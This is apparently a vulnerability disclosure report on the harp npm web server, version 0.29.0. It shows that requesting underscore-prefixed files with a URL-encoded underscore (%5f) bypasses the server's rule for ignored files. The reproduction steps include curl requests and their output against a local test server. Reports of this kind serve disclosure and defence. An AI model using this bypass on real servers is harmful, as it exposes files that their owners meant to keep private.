I would like to report information disclosure through file access in harp.
It allows to access files that are supposed to be ignored according to the harp server rules.
module name: harpversion:0.29.0npm page: https://www.npmjs.com/package/harp
zero-configuration web server with built in pre-processing
3,576 downloads in the last week
> #### Ignore those which start with underscore.
Any files or directories that begin with underscore will be ignored by the server. This is the recommended naming convention for layout and partial files. Harp will honour this rule for both files and directories.
> #### Design Rationale
By having a simple convention, it is easy to specify and identify which assets will not be served to the end user.
> #### Example
myapp.harp.io/
+- public/
|- index.html <-- will be served
|- _some-partial.jade <-- won't be served
+- _shared-partials/ <-- won't be served
+- nav.jade
This rule can be bypassed by url encoding the name of the file or directory that has been forbidden.
yarn global add harp
harp server
_secret
which should be ignored inside project directoryecho secret text >> _secret.txt
curl
curl --path-as-is 0.0.0.0:9000/_secret.txt
...
<h1>404</h1><h2>Page Not Found</h2>
...
curl --path-as-is 0.0.0.0:9000/%5fsecret.txt
secret text
The essentially bypasses the ignore files/folders feature and allows an attacker to read from a directory/file that the victim has not allowed access to.